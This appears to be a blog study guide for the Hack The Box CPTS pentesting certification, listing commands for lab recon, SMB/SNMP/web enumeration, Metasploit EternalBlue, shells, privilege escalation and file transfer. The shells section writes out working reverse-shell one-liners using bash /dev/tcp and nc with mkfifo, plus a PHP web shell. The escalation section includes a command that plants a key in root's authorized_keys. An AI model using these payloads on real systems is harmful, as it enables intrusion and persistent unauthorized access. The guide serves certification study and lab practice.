CPTS Guide - 1. Getting Started
Introduction
The aim of this series is to provide a concise, useful list of commands for the CPTS Hack The Box Certification. These ideas could well be used for CTF challenges, as you will see in the next posts. I will focus on explaining each step carefully and in a format that can be quickly read so you can use this as a reference.
Studying for the CPTS certification means diving deep into practical, hands-on pentesting. It’s not just about knowing tools—it’s about using them efficiently and understanding the why behind every step. That’s where this guide comes in. I’ve put together a clear, organized list of the most important commands you’ll rely on during your CPTS journey—from initial recon to privilege escalation. Each command includes a short explanation so you can quickly recall what it does and when to use it. Whether you’re practicing in labs or tackling the real exam, this guide is designed to save you time, boost your confidence, and keep your workflow sharp.
🧰 Basic Tools
🔧 General
Connects you to the HTB VPN so you can access remote lab machines.
sudo openvpn user.ovpn
Shows network interfaces and IP addresses to confirm VPN connectivity.
ifconfig
or
ip a
Displays the routing table to verify network paths.
netstat -rn
Establishes a secure shell session to a remote server.
ssh [email protected]
Opens a connection to an FTP server, often used for anonymous access and file retrieval.
ftp 10.129.42.253
🪟 tmux (Terminal Multiplexer)
Starts a tmux session for multitasking in terminal panes and windows.
tmux
The default prefix key to control tmux.
ctrl + b
Creates a new window in tmux, helpful for multitasking.
prefix c
Switches to window number 1 inside tmux.
prefix 1
Splits the tmux window vertically for side-by-side panes.
prefix shift + %
Splits the tmux window horizontally for stacked panes.
prefix shift + "
Navigates to the pane on the right.
prefix →
📝 Vim
Opens a file in the Vim text editor.
vim file
Enters insert mode to begin editing.
esc + i
Returns to normal mode to navigate and use commands.
esc
Deletes the character under the cursor.
x
Deletes the current word.
dw
Deletes the current line.
dd
Copies the current word.
yw
Copies the entire line.
yy
Pastes the copied or deleted content.
p
Navigates to the first line of the file.
:1
Saves the file.
:w
Quits Vim.
:q
Quits without saving.
:q!
Saves and exits.
:wq
🛠️ Pentesting
🔍 Service Scanning
Performs a basic nmap scan on a target.
nmap 10.129.42.253
Performs a thorough scan with all ports, default scripts, and service/version detection.
nmap -sV -sC -p- 10.129.42.253
Searches for custom nmap scripts related to Citrix (or similar).
locate scripts/citrix
Runs a specific nmap script against the SMB port.
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Connects to an open port manually to read the service banner.
netcat 10.10.10.10 22
Lists SMB shares on a target, anonymously.
smbclient -N -L \\\\10.129.42.253
Connects to a specific SMB share.
smbclient \\\\10.129.42.253\\users
Queries a target’s SNMP service for hostname or system info.
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0
Attempts brute force on SNMP community strings.
onesixtyone -c dict.txt 10.129.42.254
🌐 Web Enumeration
Performs directory brute-forcing using a common wordlist.
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
Scans for DNS subdomains of a given domain.
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt
Displays HTTP response headers.
curl -IL https://www.inlanefreight.com
Fingerprints a web server and its technologies.
whatweb 10.10.10.121
Checks for hidden directories in robots.txt.
curl 10.10.10.121/robots.txt
Shortcut in Firefox to view page source.
ctrl + U
📡 Public Exploits
Searches for known public exploits in the Exploit-DB database.
searchsploit openssh 7.2
Launches the Metasploit Framework.
msfconsole
Searches for the EternalBlue exploit module.
search exploit eternalblue
Loads the MS17-010 EternalBlue exploit module.
use exploit/windows/smb/ms17_010_psexec
Displays required settings for the exploit.
show options
Specifies the target IP.
set RHOSTS 10.10.10.40
Tests if the remote host is vulnerable.
check
Executes the exploit.
exploit
🐚 Using Shells
Starts a listener for a reverse shell on local port 1234.
nc -lvnp 1234
Sends a reverse shell to the attacker’s listener.
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
Uses named pipes to establish a reverse shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
Starts a bind shell listener on the remote machine.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
Connects to a bind shell already started on the remote machine.
nc 10.10.10.1 1234
Upgrades shell to a better TTY using Python.
python -c 'import pty; pty.spawn("/bin/bash")'
Another method to upgrade your shell’s interaction.
ctrl + z
stty raw -echo
fg
Creates a simple web shell in PHP.
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php
Executes a command via your PHP shell.
curl http://SERVER_IP:PORT/shell.php?cmd=id
🪜 Privilege Escalation
Runs LinPEAS for Linux privilege escalation checks.
./linpeas.sh
Lists current user’s sudo privileges.
sudo -l
Runs a command as another user using sudo.
sudo -u user /bin/echo Hello World!
Switches to root user if allowed.
sudo su -
Switches to another user account.
sudo su user -
Generates an SSH keypair.
ssh-keygen -f key
Adds your public key to root’s authorized SSH keys.
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
Logs into remote machine using the SSH key.
ssh [email protected] -i key
📂 Transferring Files
Starts a simple Python HTTP server for file transfers.
python3 -m http.server 8000
Downloads a file from the attacker’s machine.
wget http://10.10.14.1:8000/linpeas.sh
Alternative method using curl to download a file.
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh
Securely copy a file to a remote server.
scp linenum.sh user@remotehost:/tmp/linenum.sh
Encodes a file in base64 for safe transfer.
base64 shell -w 0
Decodes base64 back to the original file.
echo f0VMR...SNIO...InmDwU | base64 -d > shell
Checks file integrity via md5sum.
md5sum shell
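The encode, decode and verify steps above as one round trip, added here as an example that is not part of the original guide; the helper names, file names and sample bytes are constructed. It also shows that a paste cut short on a 4-character boundary still decodes without error, so only the digest comparison reveals the loss.

```shell
# Added example: base64 round trip with a digest check on both ends.
# Helper names, file names and sample bytes are constructed for the demo.

# Encode a file as one base64 line (what you would copy out of a terminal).
encode_file() {
    base64 -w 0 "$1"
}

# Decode a pasted base64 string into a file; non-zero status on invalid input.
decode_to() {
    printf '%s' "$1" | base64 -d > "$2" 2>/dev/null
}

# Print only the MD5 digest of a file (drops the file name column).
digest() {
    md5sum "$1" | cut -d' ' -f1
}

# Return 0 when both files have the same digest, 1 otherwise.
verify_transfer() {
    [ "$(digest "$1")" = "$(digest "$2")" ]
}

demo() {
    dir=$(mktemp -d)
    src="$dir/shell"
    # Constructed 27-byte sample with non-printable bytes (not a real binary).
    printf '\177ELF\001\002\003constructed-sample\000\377' > "$src"

    blob=$(encode_file "$src")

    # Complete paste: digests match.
    decode_to "$blob" "$dir/good"
    verify_transfer "$src" "$dir/good" && echo "full paste: digests match"

    # Paste that lost its last 4 characters: base64 -d still succeeds,
    # but the decoded file is shorter and the digest check fails.
    decode_to "${blob%????}" "$dir/bad" || true
    verify_transfer "$src" "$dir/bad" || echo "truncated paste: digest mismatch"

    rm -rf "$dir"
}

demo
```

Run `digest` on the source side before the transfer and compare it with the value computed on the destination after decoding.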
Conclusion
These foundational commands cover a wide range of situations you will face during CPTS challenges — from basic connectivity and text editing, to web and service enumeration, shell management, and privilege escalation. Bookmark this guide, practice these commands, and always understand why you are using them. Stay curious and keep hacking!